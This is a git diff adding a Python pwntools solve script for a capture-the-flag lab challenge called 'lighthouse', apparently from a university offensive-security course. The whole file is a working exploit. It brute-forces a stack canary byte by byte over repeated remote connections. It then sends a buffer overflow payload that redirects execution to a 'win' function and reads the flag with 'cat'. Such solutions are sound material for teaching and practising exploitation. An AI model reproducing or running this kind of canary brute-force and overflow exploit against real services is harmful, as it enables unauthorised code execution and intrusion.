Second CTFs part

lab1_2_recap/03_lighthouse/solve.py

@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_OFF = 136
+elf = context.binary = ELF('./lighthouse', checksec=False)
+
+#p = remote('127.0.0.1',9001)
+#p = remote('offsec.m0lecon.it',13575)
+HOST = 'offsec.m0lecon.it'
+PORT = 13535
+
+known = b"\x00"
+
+for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * CANARY_OFF + guess
+
+        io = remote(HOST, PORT, level='error')
+
+        io.recvuntil(b'>')
+        io.sendline(b'1')
+        #print(io.recvline())
+        io.recvuntil(b'entry: \n')
+        io.send(payload)
+
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+        if b"Log entry recorded. Over and out." in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+
+canary = u64(known)
+
+#canary = 0xaa0f007629225000
+
+log.info(f"Canary: {canary:#x}")
+
+
+io = remote(HOST, PORT, level='error')
+
+io.recvuntil(b'>')
+io.sendline(b'1')
+        #print(io.recvline())
+io.recvuntil(b'entry: \n')
+payload = flat(
+    b'A' * (CANARY_OFF),
+    p64(canary),
+    b'B' * 8, #rbp,
+    p64(0x000000000040101a), #ret
+    p64(0x0000000000401630), #win
+)
+io.send(payload)
+io.sendline(b'cat /home/user/flag')
+print(io.recvline())
+#io.recvline()
+#p.recvline()
+#p.recvline()